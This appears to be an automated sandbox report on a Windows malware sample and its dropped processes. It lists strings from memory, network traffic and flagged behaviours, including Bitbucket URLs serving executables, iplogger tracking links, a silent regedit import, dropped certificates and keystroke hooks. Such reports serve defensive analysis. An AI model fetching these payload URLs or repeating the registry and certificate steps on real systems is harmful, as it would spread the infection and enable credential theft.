Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.fr/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.it/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.pl/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.ru/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.si/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: servs.exe, 00000011.00000003.438656448.00000000024A0000.00000004.00000001.sdmp, servs.tmp, servs.tmp, 00000013.00000000.443300076.0000000000401000.00000020.00020000.sdmp, pass.exe, 00000018.00000003.463502157.000000007FC40000.00000004.00000001.sdmp, pass.tmp, 0000001A.00000000.466868990.0000000000401000.00000020.00020000.sdmp	String found in binary or memory: http://www.innosetup.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp	String found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: servs.exe	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
Source: servs.exe, 00000011.00000002.542433050.0000000000401000.00000020.00020000.sdmp, pass.exe, 00000018.00000000.459756419.0000000000401000.00000020.00020000.sdmp	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: servs.exe, 00000011.00000003.438656448.00000000024A0000.00000004.00000001.sdmp, servs.tmp, pass.exe, 00000018.00000003.463502157.000000007FC40000.00000004.00000001.sdmp, pass.tmp, 0000001A.00000000.466868990.0000000000401000.00000020.00020000.sdmp	String found in binary or memory: http://www.remobjects.com/ps
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp, sssevs.exe, 00000019.00000002.518884191.0000000006530000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp, sssevs.exe, 00000019.00000002.518884191.0000000006530000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: sssevs.exe, 00000019.00000002.518884191.0000000006530000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp, sssevs.exe, 00000019.00000002.518884191.0000000006530000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp, sssevs.exe, 00000019.00000002.518884191.0000000006530000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 1wOdXavtlE.exe, 00000002.00000002.476078937.0000000000402000.00000040.00000001.sdmp, sssevs.exe, 00000019.00000002.498675176.0000000004529000.00000004.00000001.sdmp	String found in binary or memory: https://api.ip.sb/geoipAppData
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: https://api.ip.sb4
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000002.476078937.0000000000402000.00000040.00000001.sdmp, sssevs.exe, 00000019.00000002.498675176.0000000004529000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org
Source: 1wOdXavtlE.exe, 00000002.00000002.484483214.0000000002C30000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: https://aui-cdn.atlassian.com
Source: 1wOdXavtlE.exe, 00000002.00000002.486504849.0000000002E4E000.00000004.00000001.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000002.486504849.0000000002E4E000.00000004.00000001.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/17d04c6a-c1d1-40c0-985a-f0740a053130/downloads/62ab596d-a885-
Source: 1wOdXavtlE.exe, 00000002.00000002.485534638.0000000002D29000.00000004.00000001.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/17d04c6a-c1d1-40c0-985a-f0740a053130/downloads/9580842f-6891-
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000002.485408204.0000000002CE9000.00000004.00000001.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/17d04c6a-c1d1-40c0-985a-f0740a053130/downloads/a1867a39-2dbe-
Source: 1wOdXavtlE.exe, 00000002.00000002.484483214.0000000002C30000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org
Source: 1wOdXavtlE.exe, 00000002.00000002.485462160.0000000002CF9000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/mminminminmin05/testtest/downloads/newred.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.485462160.0000000002CF9000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/mminminminmin05/testtest/downloads/serv.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.486504849.0000000002E4E000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000002.485462160.0000000002CF9000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/mminminminmin05/testtest/downloads/test.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.486504849.0000000002E4E000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.orgD8
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: svchost.exe, 0000000F.00000003.448897541.00000221A3B7C000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.448884292.00000221A3B74000.00000004.00000001.sdmp	String found in binary or memory: https://corp.roblox.com/contact/
Source: svchost.exe, 0000000F.00000003.448884292.00000221A3B74000.00000004.00000001.sdmp	String found in binary or memory: https://corp.roblox.com/parents/
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000002.485534638.0000000002D29000.00000004.00000001.sdmp	String found in binary or memory: https://d301sr5gafysq2.cloudfront.net;
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 0000000F.00000003.448897541.00000221A3B7C000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.448884292.00000221A3B74000.00000004.00000001.sdmp	String found in binary or memory: https://en.help.roblox.com/hc/en-us
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp	String found in binary or memory: https://get.adob
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp	String found in binary or memory: https://helpx.ad
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: https://icanhazip.com
Source: 1wOdXavtlE.exe, 00000002.00000002.476078937.0000000000402000.00000040.00000001.sdmp, sssevs.exe, 00000019.00000002.498675176.0000000004529000.00000004.00000001.sdmp	String found in binary or memory: https://icanhazip.com5https://wtfismyip.com/textChttp://bot.whatismyipaddress.com/3http://checkip.dy
Source: svchost.exe, 0000000F.00000003.439186439.00000221A3B95000.00000004.00000001.sdmp	String found in binary or memory: https://instagram.com/hiddencity_
Source: 1wOdXavtlE.exe, 00000002.00000002.476078937.0000000000402000.00000040.00000001.sdmp, sssevs.exe, 00000019.00000002.498675176.0000000004529000.00000004.00000001.sdmp	String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: 1wOdXavtlE.exe, 00000002.00000002.485462160.0000000002CF9000.00000004.00000001.sdmp	String found in binary or memory: https://iplogger.org/1tMzh7
Source: 1wOdXavtlE.exe, 00000002.00000002.482862407.00000000010C3000.00000004.00000020.sdmp	String found in binary or memory: https://iplogger.org/1tncg7
Source: 1wOdXavtlE.exe, 00000002.00000002.482862407.00000000010C3000.00000004.00000020.sdmp	String found in binary or memory: https://iplogger.org/1tncg72
Source: 1wOdXavtlE.exe, 00000002.00000002.482862407.00000000010C3000.00000004.00000020.sdmp	String found in binary or memory: https://iplogger.org/1tncg7:
Source: 1wOdXavtlE.exe, 00000002.00000002.482862407.00000000010C3000.00000004.00000020.sdmp	String found in binary or memory: https://iplogger.org/1tncg7r
Source: 1wOdXavtlE.exe, 00000002.00000002.482862407.00000000010C3000.00000004.00000020.sdmp	String found in binary or memory: https://iplogger.org/1tsTg7
Source: 1wOdXavtlE.exe, 00000002.00000002.483173141.0000000001111000.00000004.00000020.sdmp	String found in binary or memory: https://iplogger.org/1tsTg78
Source: 1wOdXavtlE.exe, 00000002.00000002.482862407.00000000010C3000.00000004.00000020.sdmp	String found in binary or memory: https://iplogger.org/1tsTg7Z
Source: 1wOdXavtlE.exe, 00000002.00000002.484483214.0000000002C30000.00000004.00000001.sdmp	String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 1wOdXavtlE.exe, 00000002.00000002.500485146.000000000443C000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0D
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000002.490169443.0000000003080000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000002.490169443.0000000003080000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_java
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000002.490169443.0000000003080000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000002.490169443.0000000003080000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: 1wOdXavtlE.exe, 00000002.00000002.484483214.0000000002C30000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website;
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: https://wtfismyip.com/text
Source: 1wOdXavtlE.exe, 00000002.00000003.399986812.0000000001111000.00000004.00000001.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: svchost.exe, 0000000F.00000003.448897541.00000221A3B7C000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.448884292.00000221A3B74000.00000004.00000001.sdmp	String found in binary or memory: https://www.roblox.com/develop
Source: svchost.exe, 0000000F.00000003.448897541.00000221A3B7C000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.448884292.00000221A3B74000.00000004.00000001.sdmp	String found in binary or memory: https://www.roblox.com/info/privacy

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734

Source: unknown	HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.216.141.204:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.216.179.59:443 -> 192.168.2.6:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.6:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.6:49733 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)

Source: ssevs.exe, 00000016.00000002.482511545.0000000001458000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Drops certificate files (DER)

Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp

File created: C:\ProgramData\Immunity\CertMgry\is-I14BP.tmp

Jump to dropped file

System Summary:

Uses regedit.exe to modify the Windows registry

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\regedit.exe regedit /s C:\ProgramData\Immunity\ses.reg

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_004A0E24 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		17_2_004A0E24
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: 19_2_005ECBC0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		19_2_005ECBC0

Creates files inside the system directory

Source: C:\Windows\System32\cmd.exe

File created: C:\Windows

Detected potential crypto function

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_00D4C36C	0_2_00D4C36C
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_00D4ED38	0_2_00D4ED38
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DC0488	0_2_04DC0488
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DC1C8B	0_2_04DC1C8B
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DC0478	0_2_04DC0478
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DC06F8	0_2_04DC06F8
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DC06E9	0_2_04DC06E9
